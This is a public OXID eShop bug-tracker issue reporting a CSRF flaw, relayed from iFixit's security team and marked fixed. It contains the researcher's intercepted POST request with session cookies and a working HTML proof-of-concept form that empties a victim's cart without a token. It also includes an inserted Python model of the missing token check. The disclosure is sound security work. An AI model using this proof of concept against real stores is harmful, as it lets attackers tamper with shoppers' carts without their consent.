View Issue Details

ID: 0006674
Project: OXID eShop (all versions)
Category: 4.04. Security
View Status: public
Last Update: 2017-08-18 15:39
Reporter: marco_steinhaeuser
Assigned To:
Priority: normal
Severity: minor
Reproducibility: always
Status: resolved
Resolution: fixed
Product Version: 4.10.5 / 5.3.5
Target Version: 4.10.6 / 5.3.6
Fixed in Version: 4.9.10 / 5.2.10
Summary: 0006674: OXID potential CSRF bug
Description:
Oxid Security Team,
   We received a report of a CSRF bug on our site `[domain.com]`.

The gist is that a carefully crafted form can adjust cart item counts without a valid stoken or CSRF protection mechanism. This is admittedly minor, but represents a valid security problem.

This could admittedly be a known issue that could be solved by updates, but we would like to confirm that this problem is known about and has been addressed.

-Daryl
iFixit Security Team



PS: Please find the original report included:

------------------------------------------------------------------

1. CSRF on the EU Store: I just need "aid", which is always the same for the victim as well. Suppose that somehow I came to know the product name which is in the cart; then I can easily get the aid value by searching for the product, intercepting my own request and using it in my CSRF code.

Here is the POST request for the product that I want to search to find "aid":


POST /index.php?lang=1& HTTP/1.1
Host: [domain.com]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Referer: https://[domain.com]/index.php?cl=details&cnid=699a66f8a4ded03b5795313fdf6281fa&anid=04832587843313ab35bf29aaab5f2ab3&listtype=search&searchparam=iphone&&lang=1
Cookie: _ga=GA1.2.532387267.1494626478; session=2b0d5cf9090fc367f6ce8753e4d4edf1; settingsc=current_page%3D%252FUser%252Feu_sso%3A%3Alast_page%3D%252FGuide%252FUser%252Fdozuki_sso; __utmx=120539472.yt3Er6fYT5-YKEiDeCa0zQ$0:0; __utmxx=120539472.yt3Er6fYT5-YKEiDeCa0zQ$0:1494630243:8035200; _gid=GA1.2.120962297.1497571472; _ceg.s=ormp2a; _ceg.u=ormp2a; language=1; sid=1f446ae471b83173539929786a3ed2a3; sid_key=oxid
Connection: keep-alive
Upgrade-Insecure-Requests: 1

stoken=3614313A&lang=1&cnid=699a66f8a4ded03b5795313fdf6281fa&listtype=search&actcontrol=details&searchparam=iphone&cl=details&aid=04832587843313ab35bf29aaab5f2ab3&anid=04832587843313ab35bf29aaab5f2ab3&parentid=0482063b7baac91cda48cf68bb0c660d&panid=&fnc=tobasket&varselid%5B0%5D=e90dfb84e30edf611e326eeb04d680de&am=1

In this I only need the aid, which is the same for the victim as well. I only need to change the aid in my CSRF code, and there is no need for any token. Now I am going to send this file to the victim, and his/her cart gets emptied.

Here is the CSRF code for that:
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="https://[domain.com]/index.php">
      <input type="hidden" name="lang" value="1" />
      <input type="hidden" name="cl" value="basket" />
      <input type="hidden" name="fnc" value="changebasket" />
      <input type="hidden" name="override" value="1" />
      <input type="hidden" name="aid" value="04832587843313ab35bf29aaab5f2ab3" />
      <input type="hidden" name="am" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
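As an added illustration from the defending side (not code from the report or from OXID eShop), the following Python model shows the check the report says is missing: a basket-changing request must carry a token bound to the requesting user's own session, so the PoC form above, which carries none, is refused while the shop's own form still works. The Session class, handle_request and the way the "stoken" is bound to the session are assumptions for this example.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed stand-in for a shop session: a basket plus a per-session CSRF token,
# named "stoken" to mirror the report's parameter (assumed, not OXID's own API).
class Session:
    def __init__(self):
        self.stoken = secrets.token_hex(4).upper()  # "3614313A"-style value
        self.basket = {}                            # aid -> amount

# Controller/function pairs that mutate the basket in this example.
STATE_CHANGING = {("basket", "changebasket"), ("details", "tobasket")}

def handle_request(session, query_string):
    """Dispatch one request and return (status, basket). Mutating actions need a
    stoken matching the *victim's* session, which a cross-site form cannot supply."""
    params = {k: v[0] for k, v in parse_qs(query_string).items()}
    if (params.get("cl"), params.get("fnc")) not in STATE_CHANGING:
        return "ok", dict(session.basket)        # read-only pages need no token
    supplied = params.get("stoken", "")
    # Constant-time compare; a missing or foreign token is rejected before any change.
    if not hmac.compare_digest(supplied.encode(), session.stoken.encode()):
        return "rejected: missing or invalid stoken", dict(session.basket)
    aid = params["aid"]
    amount = int(params.get("am", "1"))
    if params.get("override") == "1":            # set absolute amount; 0 removes
        if amount <= 0:
            session.basket.pop(aid, None)
        else:
            session.basket[aid] = amount
    else:                                        # tobasket-style increment
        session.basket[aid] = session.basket.get(aid, 0) + amount
    return "ok", dict(session.basket)

def demo():
    victim = Session()
    victim.basket = {"04832587843313ab35bf29aaab5f2ab3": 1}
    # Replay of the report's PoC form, which carries no stoken: must be rejected.
    poc = ("lang=1&cl=basket&fnc=changebasket&override=1"
           "&aid=04832587843313ab35bf29aaab5f2ab3&am=0")
    status_no_token, _ = handle_request(victim, poc)
    # A token from the attacker's own session is not the victim's: still rejected.
    attacker = Session()
    status_foreign, _ = handle_request(victim, poc + "&stoken=" + attacker.stoken)
    # The shop's own form carries the victim's token: the change is applied.
    status_valid, basket = handle_request(victim, poc + "&stoken=" + victim.stoken)
    return status_no_token, status_foreign, status_valid, basket
```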
Tags: No tags attached.
Theme: Not defined
Browser: Not defined
PHP Version: Not defined
Database Version: Not defined

Activities

There are no notes attached to this issue.